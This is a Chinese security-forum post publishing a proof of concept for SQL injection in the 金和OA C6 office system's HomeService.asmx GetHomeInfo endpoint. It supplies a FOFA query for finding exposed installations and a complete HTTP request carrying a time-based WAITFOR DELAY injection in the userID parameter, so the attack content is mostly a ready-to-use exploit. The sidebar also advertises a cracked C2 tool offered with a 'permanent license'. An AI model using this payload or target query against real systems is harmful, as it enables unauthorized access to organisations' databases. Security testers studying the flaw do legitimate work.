金和OA C6 HomeService.asmx SQL注入【附POC】

03515

漏洞概述

金和OAC6 HomeService.asmx接口处存在SQL注入漏洞

复现环境

FOFA语法:

   app="金和网络-金和OA"

漏洞复现

PoC

    GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: 
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

2024-01-08T17:57:45.png

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
未分类
# POC
喜欢就支持一下吧
点赞15 分享
mianhuatang的头像-棉花糖网络安全圈友情赞助
梯子(VPN)、VPS服务商推荐(2024年9月4日更新)-棉花糖网络安全圈
梯子(VPN)、VPS服务商推荐(2024年9月4日更新)
梯子(VPN)、VPS服务商推荐(2024年9月4日更新)
46天前 1.2W+
常用安全工具更新贴-棉花糖网络安全圈
常用安全工具更新贴
常用安全工具更新贴
46天前 8452
梯子(VPN)推荐(2024年5月5日更新)-棉花糖网络安全圈
梯子(VPN)推荐(2024年5月5日更新)
梯子(VPN)推荐(2024年5月5日更新)
8个月前 345
cloudTools最后一个公开版本-棉花糖网络安全圈
cloudTools最后一个公开版本
cloudTools最后一个公开版本
5小时前 301
C2工具vshell最新4.9.3版下载(带永久license)-棉花糖网络安全圈
C2工具vshell最新4.9.3版下载(带永久license)
C2工具vshell最新4.9.3版下载(带永久license)
昨天 260
棉花糖常用的VPS服务商(24年5月5日更新)-棉花糖网络安全圈
棉花糖常用的VPS服务商(24年5月5日更新)
棉花糖常用的VPS服务商(24年5月5日更新)
10个月前 189
相关推荐
拼客学院-陈鑫杰-全栈web网络安全架构攻防专家职位培训班实战网课-棉花糖网络安全圈
拼客学院-陈鑫杰-全栈web网络安全架构攻防专家职位培训班实战网课
拼客学院-陈鑫杰-全栈web网络安全架构攻防专家职位培训班实战网课
1年前 98
爬虫开发+app逆向大神班-棉花糖网络安全圈
爬虫开发+app逆向大神班
爬虫开发+app逆向大神班
11个月前 69
安卓App安全测试入门教程-棉花糖网络安全圈
安卓App安全测试入门教程
安卓App安全测试入门教程
8个月前 63
法海博客备份-棉花糖网络安全圈
法海博客备份
法海博客备份
7个月前 61
[看雪学苑]《安卓高级研修班(网课)》月薪三万计划-棉花糖网络安全圈
[看雪学苑]《安卓高级研修班(网课)》月薪三万计划
[看雪学苑]《安卓高级研修班(网课)》月薪三万计划
1年前 61
2023 8月版黑马JAVA线下就业班-棉花糖网络安全圈
2023 8月版黑马JAVA线下就业班
2023 8月版黑马JAVA线下就业班
8个月前 61
评论 抢沙发

请登录后发表评论

    暂无评论内容

用户封面
mianhuatang的头像-棉花糖网络安全圈友情赞助
梯子(VPN)、VPS服务商推荐(2024年9月4日更新)-棉花糖网络安全圈
梯子(VPN)、VPS服务商推荐(2024年9月4日更新)
梯子(VPN)、VPS服务商推荐(2024年9月4日更新)
46天前 1.2W+
常用安全工具更新贴-棉花糖网络安全圈
常用安全工具更新贴
常用安全工具更新贴
46天前 8452
梯子(VPN)推荐(2024年5月5日更新)-棉花糖网络安全圈
梯子(VPN)推荐(2024年5月5日更新)
梯子(VPN)推荐(2024年5月5日更新)
8个月前 345
cloudTools最后一个公开版本-棉花糖网络安全圈
cloudTools最后一个公开版本
cloudTools最后一个公开版本
5小时前 301
C2工具vshell最新4.9.3版下载(带永久license)-棉花糖网络安全圈
C2工具vshell最新4.9.3版下载(带永久license)
C2工具vshell最新4.9.3版下载(带永久license)
昨天 260
棉花糖常用的VPS服务商(24年5月5日更新)-棉花糖网络安全圈
棉花糖常用的VPS服务商(24年5月5日更新)
棉花糖常用的VPS服务商(24年5月5日更新)
10个月前 189
gcaqgj的头像-棉花糖网络安全圈

gcaqgj2小时前0

太感谢了,非常需要
shyray888的头像-棉花糖网络安全圈

shyray8888天前0

更新的话提醒我一下 感恩!表情[liulei]-棉花糖网络安全圈
shyray888的头像-棉花糖网络安全圈

shyray8889天前0

linux 提示Could not acquire license: Signature decryption failed with code: -2
shyray888的头像-棉花糖网络安全圈

shyray8889天前0

linux的呢
mianhuatang2的头像-棉花糖网络安全圈

mianhuatang29天前0

评论评论
mianhuatang2的头像-棉花糖网络安全圈

mianhuatang29天前0

测试评论一下啊
mianhuatang2的头像-棉花糖网络安全圈

mianhuatang29天前0

测试评论
头像

gogo9天前0

学习一下